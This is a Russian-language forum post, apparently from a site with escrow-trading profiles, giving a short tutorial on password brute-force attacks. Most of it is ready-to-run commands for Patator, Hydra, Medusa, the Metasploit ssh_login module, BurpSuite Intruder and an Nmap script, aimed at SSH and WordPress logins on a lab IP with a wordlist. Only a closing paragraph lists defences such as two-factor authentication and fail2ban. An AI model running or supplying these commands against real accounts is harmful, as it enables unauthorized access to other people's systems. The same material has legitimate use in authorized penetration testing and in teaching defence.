Полезные знания Brute Force

  • Автор темы Everest_RR
  • Дата начала

Everest_RR

Everest_RR Оффлайн

Everest_RR

Регистрация
17/9/18
Сообщения
191
Симпатии
111
Депозит
0 руб.
Сделок через гаранта
0
Автор темы #1
brute-force.jpg
Brute-force атаки

Brute-force (полный перебор) – метод решения математических задач, на сложность которых влияет количество всех возможных решений. Термин принято использовать в контексте хакерских атак в том случае, когда злоумышленник данным способом подбирает логин и пароль к учетной записи пользователя или какому-либо сервису.
На сегодняшний день существует масса инструментов, с помощью которых можно выполнять Brute-force атаки, рассмотри их ниже.
Brute-force SSH
Понадобится тестовая машина 192.168.60.50. В данном случае будем подбирать пароль пользователя test по SSH и нам понадобится стандартный словарь rockyou.txt.
 Patator
Используем команду:
patator ssh_login host=192.168.60.50 user=test password=FILE0 0=/root/wordlist -x ignore:mesg=’Authentication failed’
 Hydra

Вводим команду:
hydra -V -f -t 4 -l test -P /root/wordlist ssh://192.168.60.50
 Medusa
Применяем:
medusa -h 192.168.60.50 -u test -P /root/wordlist -M ssh -f -v 6
 Metasploit
Нужно задействовать модуль:
use auxiliary/scanner/ssh/ssh_login
И указать необходимые параметры через команду "set".
Brute-force WordPress
Подбор пароля осуществляется методом авторизации веб-формы. Воспользуемся учетной записью администратора wordpress.

BurpSuite
Пробуем авторизоваться, используя любой пароль и логин. Делаем это ля просмотра запросов, проходящих через BurpSuite. Ищем POST запрос и работаем с ним. BODY содержит данную информацию и при желании мы можем подставлять любые нужные значения.

Далее передаем запрос через Intruder, в Payload Positions оставляем sniper (тип атаки), для проверки применяем pwd. Теперь остается загрузить словарь и начать атаку. Неверный пароль вернет код ответа 200, верный – 302.

Hydra
Пользуемся командой:
hydra -V -f -l admin -P /root/wordlist -t 4 http-post-form://192.168.60.50 -m "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1:S=302"
Patator работает по такому же принципу как Hydra.

Nmap
Позволяет производить пароль паролей для веб-форм авторизации. Для этого используем:
nmap 192.168.60.50 --script http-wordpress-brute --script-args 'user= admin,passdb= /root/wordlist, http-wordpress-brute.thread=3, brute.firstonly=true'

В заключение

В данном материале мы кратко пробежались по основным инструментам, с помощью которых можно подобрать пароль. И помните, чтобы избежать атак, не создавайте слишком простые пароли, или те, которые содержат личную информацию (дату рождения, фамилию и т.д.).

Обязательно ограничивайте подключение по IP-адресу, используйте двухфакторную аутентификацию, вовремя блокируйте атаки при помощи SIEM, WAF, fail2ban.
 
Probiv.biz

Меню

Сверху Снизу